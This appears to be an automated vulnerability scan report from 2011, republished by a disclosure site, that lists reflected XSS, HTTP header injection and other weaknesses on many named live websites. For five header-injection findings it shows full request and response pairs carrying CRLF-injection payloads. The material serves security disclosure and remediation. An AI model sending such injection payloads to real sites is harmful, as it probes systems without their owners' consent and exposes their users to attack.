XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07092011-01

Report generated by XSS.CX at Sat Jul 09 06:02:38 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. HTTP header injection

1.1. http://techflash.com/about.html [REST URL parameter 1]

1.2. http://www.techflash.com/microsoft [REST URL parameter 1]

1.3. http://www2.bizjournals.com/css/techflash.css [REST URL parameter 2]

1.4. http://www2.bizjournals.com/js/omniture.js [REST URL parameter 2]

1.5. http://www2.bizjournals.com/js/tabs.js [REST URL parameter 2]

2. Cross-site scripting (reflected)

2.1. http://seg.sharethis.com/socialOptimization.ps.js [campaign parameter]

2.2. http://widgets.digg.com/buttons/count [url parameter]

2.3. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

2.4. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

2.5. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

2.6. http://www.bebo.com/Profile.jsp [REST URL parameter 1]

2.7. http://www.bebo.com/c/games [REST URL parameter 2]

2.8. http://www.bebo.com/c/games [REST URL parameter 2]

2.9. http://www.bebo.com/c/games [REST URL parameter 2]

2.10. http://www.bebo.com/c/games [REST URL parameter 2]

2.11. http://www.bebo.com/c/games/ [REST URL parameter 2]

2.12. http://www.bebo.com/c/games/ [REST URL parameter 2]

2.13. http://www.bebo.com/c/games/ [REST URL parameter 2]

2.14. http://www.bebo.com/c/games/ [REST URL parameter 2]

2.15. http://www.bebo.com/c/invite/join [REST URL parameter 2]

2.16. http://www.bebo.com/c/invite/join [REST URL parameter 2]

2.17. http://www.bebo.com/c/invite/join [REST URL parameter 2]

2.18. http://www.bebo.com/c/invite/join [REST URL parameter 2]

2.19. http://www.bebo.com/c/invite/join [REST URL parameter 3]

2.20. http://www.bebo.com/c/invite/join [REST URL parameter 3]

2.21. http://www.bebo.com/c/invite/join [REST URL parameter 3]

2.22. http://www.bebo.com/c/invite/join [REST URL parameter 3]

2.23. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

2.24. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

2.25. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

2.26. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

2.27. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

2.28. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

2.29. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

2.30. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

2.31. http://www.bebo.com/c/photos/view [REST URL parameter 2]

2.32. http://www.bebo.com/c/photos/view [REST URL parameter 2]

2.33. http://www.bebo.com/c/photos/view [REST URL parameter 2]

2.34. http://www.bebo.com/c/photos/view [REST URL parameter 2]

2.35. http://www.bebo.com/c/photos/view [REST URL parameter 3]

2.36. http://www.bebo.com/c/photos/view [REST URL parameter 3]

2.37. http://www.bebo.com/c/photos/view [REST URL parameter 3]

2.38. http://www.bebo.com/c/photos/view [REST URL parameter 3]

2.39. http://www.bebo.com/c/search [REST URL parameter 2]

2.40. http://www.bebo.com/c/search [REST URL parameter 2]

2.41. http://www.bebo.com/c/search [REST URL parameter 2]

2.42. http://www.bebo.com/c/search [REST URL parameter 2]

2.43. http://www.bebo.com/c/share [REST URL parameter 2]

2.44. http://www.bebo.com/c/share [REST URL parameter 2]

2.45. http://www.bebo.com/c/share [REST URL parameter 2]

2.46. http://www.bebo.com/c/share [REST URL parameter 2]

2.47. http://www.bebo.com/c/skin/index [REST URL parameter 2]

2.48. http://www.bebo.com/c/skin/index [REST URL parameter 2]

2.49. http://www.bebo.com/c/skin/index [REST URL parameter 2]

2.50. http://www.bebo.com/c/skin/index [REST URL parameter 2]

2.51. http://www.bebo.com/c/skin/index [REST URL parameter 3]

2.52. http://www.bebo.com/c/skin/index [REST URL parameter 3]

2.53. http://www.bebo.com/c/skin/index [REST URL parameter 3]

2.54. http://www.bebo.com/c/skin/index [REST URL parameter 3]

2.55. http://www.masshightech.com/tech-news-widget/parser/ [callback parameter]

2.56. http://www.stumbleupon.com/submit [url parameter]

2.57. http://www.texotela.co.uk/ [name of an arbitrarily supplied request parameter]

2.58. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 1]

2.59. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 2]

2.60. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 3]

2.61. http://www.texotela.co.uk/code/jquery/newsticker/ [name of an arbitrarily supplied request parameter]

2.62. https://wb1.ubs.com/cache/fin/pub/gvu/quotes/markets_instruments [REST URL parameter 6]

2.63. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 3]

2.64. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 4]

2.65. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 5]

3. Cleartext submission of password

3.1. http://twitter.com/intent/session

3.2. http://www.sipc.org/

3.3. http://www.stumbleupon.com/

3.4. http://www.stumbleupon.com/login.php

4. Session token in URL

4.1. http://www.facebook.com/extern/login_status.php

4.2. http://www.softlayer.com/about/contact-us/

5. Flash cross-domain policy

5.1. http://www.facebook.com/crossdomain.xml

5.2. http://www.stumbleupon.com/crossdomain.xml

5.3. http://twitter.com/crossdomain.xml

6. Cookie scoped to parent domain

6.1. http://www.bebo.com/c/share

6.2. http://www.diigo.com/post

6.3. http://www.myspace.com/Modules/PostTo/Pages/

6.4. http://www.opensource.org/licenses/gpl-license.php

6.5. http://www.opensource.org/licenses/mit-license.php

6.6. http://segments.adap.tv/data/

6.7. https://signup.live.com/signup.aspx

6.8. http://social.zune.net/frag/MediaReviewBlock/

6.9. http://social.zune.net/search.aspx

6.10. http://social.zune.net/zPage.aspx

6.11. http://spaces.live.com/BlogIt.aspx

6.12. http://va.px.invitemedia.com/goog_imp

6.13. http://www.bing.com/search

6.14. http://www.bing.com/search

6.15. http://www.burstnet.com/enlightn/7111//82F1/

6.16. http://www.facebook.com/2008/fbml

6.17. http://www.facebook.com/sharer/sharer.php

6.18. http://www.fark.com/cgi/farkit.pl

6.19. http://www.google.com/bookmarks/mark

6.20. http://www.linkedin.com/shareArticle

6.21. http://www.newsvine.com/_tools/seed&save

6.22. http://www.reddit.com/submit

6.23. http://www.tudou.com/v/

6.24. http://www.ubs.com/1/live/homepage/global/sprite_e.css

6.25. http://www.ubs.com/1/live/homepage/shared/icon_arrow_right_white.gif

6.26. http://www.ubs.com/1/live/homepage/shared/index.css

6.27. http://www.ubs.com/1/live/homepage/shared/logo.gif

6.28. http://www.ubs.com/1/live/homepage/shared/thickbox.css

6.29. http://www.zune.net/en-US/legal/codeOfConduct.htm

6.30. http://www.zune.net/en-US/legal/termsofservice.htm

6.31. http://www.zune.net/en-US/press/default.htm

6.32. http://www.zune.net/en-US/support

6.33. http://www.zune.net/en-US/support/

6.34. http://www.zune.net/en-us/legal/safety.htm

6.35. http://www.zune.net/en-us/newsletter/default.htm

6.36. http://www.zune.net/en-us/products/zuneonxbox/default.htm

6.37. http://www.zune.net/en-us/support/accessibility/default.htm

7. Cookie without HttpOnly flag set

7.1. https://selfservice.ibb.ubs.com/idm/user/ubs/ubs_selfServiceWelcome.jsp

7.2. http://www.armaniexchange.com/category/womens/sunglasses.do

7.3. http://www.armaniexchange.com/storelocator.do

7.4. http://www.bebo.com/c/share

7.5. http://www.benjaminsterling.com/experiments/jqShuffle/

7.6. http://www.diigo.com/post

7.7. http://www.evernote.com/clip.action

7.8. http://www.linkedin.com/shareArticle

7.9. http://www.myspace.com/Modules/PostTo/Pages/

7.10. http://www.opensource.org/licenses/gpl-license.php

7.11. http://www.opensource.org/licenses/mit-license.php

7.12. http://segments.adap.tv/data/

7.13. https://signup.live.com/signup.aspx

7.14. http://social.zune.net/frag/MediaReviewBlock/

7.15. http://social.zune.net/search.aspx

7.16. http://social.zune.net/zPage.aspx

7.17. http://spaces.live.com/BlogIt.aspx

7.18. http://va.px.invitemedia.com/goog_imp

7.19. https://wordpress.com/wp-login.php

7.20. http://www.bing.com/search

7.21. http://www.bing.com/search

7.22. http://www.burstnet.com/enlightn/7111//82F1/

7.23. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

7.24. http://www.cadence.com/community/themes/default/style/DynamicStyle.aspx

7.25. http://www.facebook.com/2008/fbml

7.26. http://www.google.com/bookmarks/mark

7.27. http://www.masshightech.com/favicon.ico

7.28. http://www.masshightech.com/tech-news-widget/parser/

7.29. http://www.masshightech.com/tech-news-widget/widget.js

7.30. http://www.newsvine.com/_tools/seed&save

7.31. http://www.reddit.com/submit

7.32. http://www.tudou.com/v/

7.33. http://www.zune.net/en-US/legal/codeOfConduct.htm

7.34. http://www.zune.net/en-US/legal/termsofservice.htm

7.35. http://www.zune.net/en-US/press/default.htm

7.36. http://www.zune.net/en-US/support

7.37. http://www.zune.net/en-US/support/

7.38. http://www.zune.net/en-us/legal/safety.htm

7.39. http://www.zune.net/en-us/newsletter/default.htm

7.40. http://www.zune.net/en-us/products/zuneonxbox/default.htm

7.41. http://www.zune.net/en-us/support/accessibility/default.htm

7.42. http://zune.net/en-US/

7.43. http://zune.net/en-US/default.htm

7.44. http://zune.net/en-US/flexpage.aspx

7.45. http://zune.net/en-us/promotions/zunepassatt.htm

7.46. http://zune.net/xweb/www/cms/templates/flexpage.aspx

8. Password field with autocomplete enabled

8.1. http://twitter.com/

8.2. http://twitter.com/

8.3. http://twitter.com/

8.4. http://twitter.com/intent/session

8.5. https://wordpress.com/wp-login.php

8.6. http://www.bebo.com/

8.7. https://www.drtserver.com/microsoft/1/login.html

8.8. http://www.evernote.com/clip.action

8.9. http://www.facebook.com/2008/fbml

8.10. http://www.fark.com/cgi/farkit.pl

8.11. http://www.fark.com/cgi/farkit.pl

8.12. http://www.linkedin.com/shareArticle

8.13. http://www.sipc.org/

8.14. http://www.softlayer.com/about/analyst-relations/

8.15. http://www.softlayer.com/about/careers/

8.16. http://www.softlayer.com/about/contact-us/

8.17. http://www.softlayer.com/about/feedback

8.18. http://www.softlayer.com/cloudlayer/

8.19. http://www.softlayer.com/dedicated/

8.20. http://www.softlayer.com/index.html

8.21. http://www.softlayer.com/legal/

8.22. http://www.softlayer.com/partners/

8.23. http://www.softlayer.com/press

8.24. http://www.softlayer.com/resources/

8.25. http://www.softlayer.com/resources/mobile-apps/

8.26. http://www.softlayer.com/sitemap/

8.27. http://www.softlayer.com/solutions/

8.28. http://www.softlayer.com/specials/

8.29. http://www.softlayer.com/virtualization/

8.30. http://www.stumbleupon.com/

8.31. http://www.stumbleupon.com/login.php

9. Source code disclosure

10. Referer-dependent response

11. Cross-domain POST

11.1. https://www.drtserver.com/microsoft/1/login.html

11.2. http://www.gnu.org/licenses/gpl.html

12. SSL cookie without secure flag set

12.1. https://wordpress.com/wp-login.php

12.2. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif

12.3. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/njs.gif

13. Cross-domain Referer leakage

13.1. http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842

13.2. http://social.zune.net/xweb/lx/js/zpagescripts.js

13.3. http://support.microsoft.com/contactus/

13.4. http://twitter.com/intent/session

13.5. http://www.bing.com/search

13.6. http://www.bing.com/search

13.7. http://www.blogger.com/blog_this.pyra

13.8. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

13.9. http://www.evernote.com/clip.action

13.10. http://www.facebook.com/plugins/like.php

13.11. http://www.propeller.com/submit/

13.12. http://www.stumbleupon.com/submit

13.13. http://zune.net/xweb/lx/js/lxUtil.js

14. Cross-domain script include

14.1. http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842

14.2. http://social.zune.net/TV/SERIES/FUTURAMA/06FC3866-29D7-4B23-AD8A-D1A2EBD4C35D

14.3. http://social.zune.net/album/F59FD406-0100-11DB-89CA-0019B92A3933

14.4. http://techflash.com/

14.5. http://techflash.com/about.html

14.6. http://twitter.com/account/resend_password

14.7. http://twitter.com/intent/session

14.8. https://wordpress.com/wp-login.php

14.9. http://www.armaniexchange.com/category/womens/sunglasses.do

14.10. http://www.armaniexchange.com/storelocator.do

14.11. http://www.beautyoftheweb.com/

14.12. http://www.beautyoftheweb.com/

14.13. http://www.beautyoftheweb.com/

14.14. http://www.bebo.com/

14.15. http://www.bebo.com/Chart.jsp

14.16. http://www.bebo.com/SwitchLanguage.jsp

14.17. http://www.bebo.com/c/invite/join

14.18. http://www.bebo.com/c/photos/view

14.19. http://www.bebo.com/c/search

14.20. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

14.21. http://www.facebook.com/2008/fbml

14.22. http://www.fark.com/cgi/farkit.pl

14.23. http://www.microsofthardwareblog.com/

14.24. http://www.opensource.org/licenses/gpl-license.php

14.25. http://www.opensource.org/licenses/mit-license.php

14.26. http://www.ravenwoodfair.com/viximo.xd_proxy.html

14.27. http://www.softlayer.com/about/analyst-relations/

14.28. http://www.softlayer.com/about/careers/

14.29. http://www.softlayer.com/about/contact-us/

14.30. http://www.softlayer.com/about/feedback

14.31. http://www.softlayer.com/cloudlayer/

14.32. http://www.softlayer.com/dedicated/

14.33. http://www.softlayer.com/index.html

14.34. http://www.softlayer.com/legal/

14.35. http://www.softlayer.com/partners/

14.36. http://www.softlayer.com/press

14.37. http://www.softlayer.com/resources/

14.38. http://www.softlayer.com/resources/mobile-apps/

14.39. http://www.softlayer.com/sitemap/

14.40. http://www.softlayer.com/solutions/

14.41. http://www.softlayer.com/specials/

14.42. http://www.softlayer.com/virtualization/

14.43. http://www.stumbleupon.com/

14.44. http://www.stumbleupon.com/login.php

14.45. http://www.stumbleupon.com/submit

14.46. http://www.texotela.co.uk/

14.47. http://www.texotela.co.uk/code/jquery/newsticker/

14.48. http://www.tudou.com/v/

14.49. http://www.zune.net/en-US/support

14.50. http://www.zune.net/en-US/support/

14.51. http://zuneinsider.com/

15. TRACE method is enabled

15.1. http://widgets.digg.com/

15.2. http://www.stumbleupon.com/

16. Email addresses disclosed

16.1. http://techflash.com/about.html

16.2. http://w.sharethis.com/button/buttons.js

16.3. http://www.beautyoftheweb.com/combres.axd/siteJs/-1234531867/

16.4. http://www.cadence.com/_layouts/_cadenceomniture/s_code.js

16.5. http://www.fark.com/cgi/farkit.pl

16.6. http://www.gnu.org/licenses/gpl.html

16.7. http://www.masshightech.com/tech-news-widget/widget.js

16.8. http://www.mixx.com/submit

16.9. http://www.opensource.org/licenses/gpl-license.php

16.10. http://www.opensource.org/licenses/mit-license.php

16.11. http://www.sipc.org/

16.12. http://www.sipc.org/members/sipclogo.cfm

16.13. http://www.softlayer.com/about/analyst-relations/

16.14. http://www.softlayer.com/about/careers/

16.15. http://www.softlayer.com/about/contact-us/

16.16. http://www.softlayer.com/about/feedback

16.17. http://www.softlayer.com/cloudlayer/

16.18. http://www.softlayer.com/dedicated/

16.19. http://www.softlayer.com/index.html

16.20. http://www.softlayer.com/legal/

16.21. http://www.softlayer.com/partners/

16.22. http://www.softlayer.com/press

16.23. http://www.softlayer.com/resources/

16.24. http://www.softlayer.com/resources/mobile-apps/

16.25. http://www.softlayer.com/sitemap/

16.26. http://www.softlayer.com/solutions/

16.27. http://www.softlayer.com/specials/

16.28. http://www.softlayer.com/virtualization/

16.29. http://www.ubs.com/1/e/index/phishing.html

16.30. http://www.ubs.com/1/e/online/legal/data_source.html

16.31. http://www.ubs.com/1/live/homepage/shared/jquery.cookie.js

16.32. http://www.zune.net/en-US/press/default.htm

16.33. http://www.zune.net/en-us/newsletter/default.htm

17. Private IP addresses disclosed

17.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

17.2. http://static.ak.fbcdn.net/connect/xd_proxy.php

17.3. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/DhINBSBsTFQ.css

17.4. http://www.facebook.com/2008/fbml

17.5. http://www.facebook.com/extern/login_status.php

17.6. http://www.facebook.com/extern/login_status.php

17.7. http://www.facebook.com/plugins/like.php

17.8. http://www.facebook.com/plugins/like.php

17.9. http://www.facebook.com/sharer.php

17.10. http://www.facebook.com/sharer.php

17.11. http://www.facebook.com/sharer.php

17.12. http://www.facebook.com/sharer.php

17.13. http://www.facebook.com/sharer.php

17.14. http://www.facebook.com/sharer.php

17.15. http://www.facebook.com/sharer/sharer.php

17.16. http://www.facebook.com/sharer/sharer.php

17.17. http://www.facebook.com/sharer/sharer.php

17.18. http://www.vimeo.com/moogaloop.swf

18. Credit card numbers disclosed

19. Robots.txt file

19.1. http://tag.admeld.com/pixel

19.2. http://twitter.com/intent/session

19.3. http://widgets.digg.com/buttons/count

19.4. http://www.facebook.com/sharer/sharer.php

19.5. http://www.ibb.ubs.com/favicon.ico

19.6. http://www.stumbleupon.com/submit

19.7. http://www.ubs.com/

19.8. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif

19.9. https://www2.ubs.com/1/ssl/e/contact/contact.html

20. Cacheable HTTPS response

20.1. https://selfservice.ibb.ubs.com/idm/user/ubs/ubs_selfServiceWelcome.jsp

20.2. https://www.ubs.com/1/e/online/contact.html

20.3. https://www2.ubs.com/1/RenderImage/contact/contact

20.4. https://www2.ubs.com/1/RenderImage/contact/locations

20.5. https://www2.ubs.com/1/RenderImage/contact/order

20.6. https://www2.ubs.com/1/e/contact.html

20.7. https://www2.ubs.com/1/e/contact/contactus.html

20.8. https://www2.ubs.com/1/e/contact/locations.html

20.9. https://www2.ubs.com/1/e/contact/order.html

20.10. https://www2.ubs.com/1/e/globalam/funds.html

20.11. https://www2.ubs.com/1/e/index.html

20.12. https://www2.ubs.com/1/e/index/legalinfo2/disclaimer.html

20.13. https://www2.ubs.com/1/e/index/legalinfo2/privacy.html

20.14. https://www2.ubs.com/1/e/service_finder/individual.html

20.15. https://www2.ubs.com/1/e/ubs_ch/private/cards/creditcards/services/customerservice.html

20.16. https://www2.ubs.com/1/f/contact/locations.html

20.17. https://www2.ubs.com/1/g/contact/locations.html

20.18. https://www2.ubs.com/1/g/contact/order.html

20.19. https://www2.ubs.com/1/i/contact/locations.html

20.20. https://www2.ubs.com/1/ssl/e/contact/contact.html

20.21. https://www2.ubs.com/6/e/contact/locations.html

20.22. https://www2.ubs.com/6/e/contact/order.html

21. HTML does not specify charset

21.1. http://seg.sharethis.com/socialOptimization.ps.js

21.2. http://thezwsxp.com/

21.3. http://thezwsxp.com/favicon.ico

21.4. http://thezwsxp.com/img4/centralLanding.css

21.5. http://thezwsxp.com/index.php

21.6. http://thezwsxp.com/index2.php

21.7. http://thezwsxp.com/undefined

21.8. http://watson.microsoft.com/StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm

21.9. http://www.ravenwoodfair.com/viximo

21.10. http://www.twitvid.com/player/

21.11. http://www.ubs.com/1/e/index/siterating.html

21.12. http://www.ubs.com/2/e/quotes_help/ubsHelp.htm

21.13. http://www.viddyou.com/get/v2_

21.14. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

22. HTML uses unrecognised charset

22.1. http://vut8rr7o.leoptic.com/index2.php

22.2. http://www.tudou.com/v/

22.3. http://www.ubs.com/4/legal_disclaimer/jp_disclaimer.html

22.4. http://www.ubs.com/4/legal_disclaimer/ko_privacy.html

22.5. http://www.ubs.com/4/legal_disclaimer/ru_privacy.html

22.6. http://www.ubs.com/4/legal_disclaimer/sc_chi_privacy.html

22.7. http://www.ubs.com/4/legal_disclaimer/tr_hk_privacy.html

22.8. http://www.ubs.com/4/legal_disclaimer/tr_tw_privacy.html

23. Content type incorrectly stated

23.1. http://seg.sharethis.com/socialOptimization.ps.js

23.2. http://urls.api.twitter.com/1/urls/count.json

23.3. http://watson.microsoft.com/StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm

23.4. http://www.cadence.com/_layouts/_cdn_js_lib/js_banners.js

23.5. http://www.cadence.com/_layouts/_cdn_js_lib/js_library.js

23.6. http://www.facebook.com/extern/login_status.php

23.7. http://www.masshightech.com/favicon.ico

23.8. http://www.masshightech.com/tech-news-widget/parser/

23.9. http://www.mister-wong.com/index.php

23.10. http://www.tudou.com/v/

23.11. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

23.12. http://zune.net/en-US/bottom.png

23.13. http://zune.net/en-US/top.png

23.14. http://zune.net/xml/Carousel.xml

24. Content type is not specified

25. SSL certificate

25.1. https://www.ubs.com/

25.2. https://www2.ubs.com/


1. HTTP header injection  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://techflash.com/about.html [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://techflash.com
Path:   /about.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22627%0d%0a8e444badafd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22627%0d%0a8e444badafd HTTP/1.1
Host: techflash.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-399196261-1309960828609; s_pers=%20s_vnum%3D1312552828670%2526vn%253D1%7C1312552828670%3B%20s_lv%3D1309960845575%7C1404568845575%3B%20s_lv_s%3DFirst%2520Visit%7C1309962645575%3B%20s_dslv%3DFirst%2520Visit%7C1310565645579%3B%20s_p12%3DFirst%2520Visit%7C1310565645581%3B%20s_invisit%3Dtrue%7C1309962645583%3B; s_sess=%20s_ria%3Dflash%252010%257Csilverlight%2520not%2520detected%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:02:07 GMT
Server: Apache
Location: /22627
8e444badafd/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 200

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/22627
8e444badafd/">here</A>.<P>
</BODY></HTML>
1.2. http://www.techflash.com/microsoft [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.techflash.com
Path:   /microsoft

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3c3d8%0d%0a60579d46399 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3c3d8%0d%0a60579d46399 HTTP/1.1
Host: www.techflash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Wed, 06 Jul 2011 13:57:28 GMT
Server: Apache
Location: /3c3d8
60579d46399/
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/3c3d8
60579d46399/">here</A>.<P>
</BODY></HTML>
1.3. http://www2.bizjournals.com/css/techflash.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.bizjournals.com
Path:   /css/techflash.css

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9af07%0d%0aafd817301ae was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /css/9af07%0d%0aafd817301ae?v=18 HTTP/1.1
Host: www2.bizjournals.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:00:48 GMT
Server: Apache
Location: /css/9af07
afd817301ae/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 204

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/css/9af07
afd817301ae/">here</A>.<P>
</BODY></HT
...[SNIP]...
1.4. http://www2.bizjournals.com/js/omniture.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.bizjournals.com
Path:   /js/omniture.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 1cfe7%0d%0a87af2d15638 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /js/1cfe7%0d%0a87af2d15638?v=14 HTTP/1.1
Host: www2.bizjournals.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:01:03 GMT
Server: Apache
Location: /js/1cfe7
87af2d15638/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 203

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/js/1cfe7
87af2d15638/">here</A>.<P>
</BODY></HTM
...[SNIP]...
1.5. http://www2.bizjournals.com/js/tabs.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.bizjournals.com
Path:   /js/tabs.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 91b43%0d%0ab07f4079d29 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /js/91b43%0d%0ab07f4079d29?v=10 HTTP/1.1
Host: www2.bizjournals.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:00:43 GMT
Server: Apache
Location: /js/91b43
b07f4079d29/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 203

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/js/91b43
b07f4079d29/">here</A>.<P>
</BODY></HTM
...[SNIP]...
2. Cross-site scripting (reflected)  previous  next
There are 65 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

